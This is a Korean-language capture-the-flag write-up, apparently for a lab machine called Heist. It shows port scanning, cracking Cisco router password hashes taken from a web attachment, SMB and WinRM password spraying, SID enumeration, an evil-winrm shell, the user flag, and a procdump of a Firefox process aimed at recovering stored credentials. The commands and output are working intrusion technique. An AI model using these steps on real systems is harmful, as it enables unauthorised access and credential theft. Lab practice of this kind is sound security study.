Proof of Concept

10.129.96.157

Nmap

PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Information Gathering

hosts 정보 수집

┌──(kali㉿kali)-[~/Heist]
└─$ nxc smb 10.129.96.157 --generate-hosts-file hosts
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
 
┌──(kali㉿kali)-[~/Heist]
└─$ cat hosts
10.129.96.157     SUPPORTDESK.SupportDesk SUPPORTDESK

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/Heist]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.96.157     SUPPORTDESK.SupportDesk SUPPORTDESK

Initial Access

80포트 웹서비스 접속 시 로그인 페이지가 존재하며, “Login as guest” 버튼을 클릭하면 /Issues.php 페이지로 이동됨

/issues.php 페이지에서 사용자 “Hazard”를 발견했으며, Attachment 클릭 시 http://10.129.96.157/attachments/config.txt 파일 내용에서 암호화된 비밀번호 발견

enable secret 5 $1$ pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

해시 크랙해서 평문 비밀번호 획득

stealth1agent

$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Cisco type 7 비밀번호 크랙하여 평문 비밀번호 획득

https://www.firewall.cx/cisco/cisco-routers/cisco-type7-password-crack.html

0242114B0E143F015F5D1E161713:$uperP@ssword
02375012182C1A1D751618034F36415408:Q4)sJu\Y8qz*A3?d

hazard:stealth1agent로 SMB 인증 성공

┌──(kali㉿kali)-[~/Heist]
└─$ nxc smb 10.129.96.157 -u 'hazard' -p 'stealth1agent'
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent

타겟 머신 사용자 열거

┌──(kali㉿kali)-[~/Heist]
└─$ impacket-lookupsid 'hazard:stealth1agent@10.129.96.157' -target-ip 10.129.96.157
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

확인한 사용자에 대해 이전에 획득한 비밀번호 인증 시도 결과, Chase:Q4)sJu\Y8qz*A3?d 로 SMB 인증 성공

┌──(kali㉿kali)-[~/Heist]
└─$ nxc winrm 10.129.96.157 -u userlist.txt -p password.txt
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

Chase:Q4)sJu\Y8qz*A3?d 로 WinRM 인증 성공

┌──(kali㉿kali)-[~/Heist]
└─$ nxc winrm 10.129.96.157 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

Chase 사용자로 WinRM 접속

┌──(kali㉿kali)-[~/Heist]
└─$ evil-winrm -i 10.129.96.157 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
 
Evil-WinRM shell v3.9
 
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>

Read user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
c5ff5802e2c15da94759bd9c6adb06c8
*Evil-WinRM* PS C:\Users\Chase\Desktop> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::166
   IPv6 Address. . . . . . . . . . . : dead:beef::4512:c4cf:3d03:7bd0
   Link-local IPv6 Address . . . . . : fe80::4512:c4cf:3d03:7bd0%15
   IPv4 Address. . . . . . . . . . . : 10.129.96.157
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%15
                                       10.129.0.1

Privilege Escalation

C:\Users\Chase\Desktop 디렉토리에서 todo.txt 파일 발견

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir
 
 
    Directory: C:\Users\Chase\Desktop
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        2/26/2026   8:06 PM             34 user.txt
 
 
*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
 
Done:
1. Restricted access for guest user.

WinPEAS 열거 결과 Firefox 데이터베이스 발견

<SNIP>
 
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
 
ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Firefox
    Info: if no credentials were listed, you might need to close the browser and try again.
 
ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Firefox DBs
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
    Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
È Run SharpWeb (https://github.com/djhohnstein/SharpWeb)
 
<SNIP>

Firefox가 실행중인 것을 확인

*Evil-WinRM* PS C:\Users\Chase\Documents> ps
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    473      18     2352       5456               368   0 csrss
    290      13     1968       5036               480   1 csrss
    357      15     3484      14392              4368   1 ctfmon
    254      14     3960      13200              3724   0 dllhost
    166       9     1876       9676       0.05   6932   1 dllhost
    617      32    29372      58256               968   1 dwm
   1496      57    23744      77956              4244   1 explorer
    355      25    16472      39112       0.16    748   1 firefox
   1071      69   140560     217932       7.70   6580   1 firefox
    347      19    10268      36636       0.19   6692   1 firefox
    401      33    31476      91480       0.86   6836   1 firefox
    378      28    22024      58908       0.47   7100   1 firefox
     49       6     1512       3864               784   0 fontdrvhost
     49       6     1796       4632               792   1 fontdrvhost
<SNIP>

firefox 프로세스 메모리 덤프

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64.exe -accepteula -ma 748 firefoxdump
 
ProcDump v11.1 - Sysinternals process dump utility
Copyright (C) 2009-2025 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
 
[22:05:29]Dump 1 info: Available space: 3693731840
[22:05:29]Dump 1 initiated: C:\Users\Chase\Documents\firefoxdump.dmp
[22:05:29]Dump 1 writing: Estimated dump file size is 298 MB.
[22:05:29]Dump 1 complete: 298 MB written in 0.4 seconds
[22:05:30]Dump count reached.

KalioNix

Explorer

Heist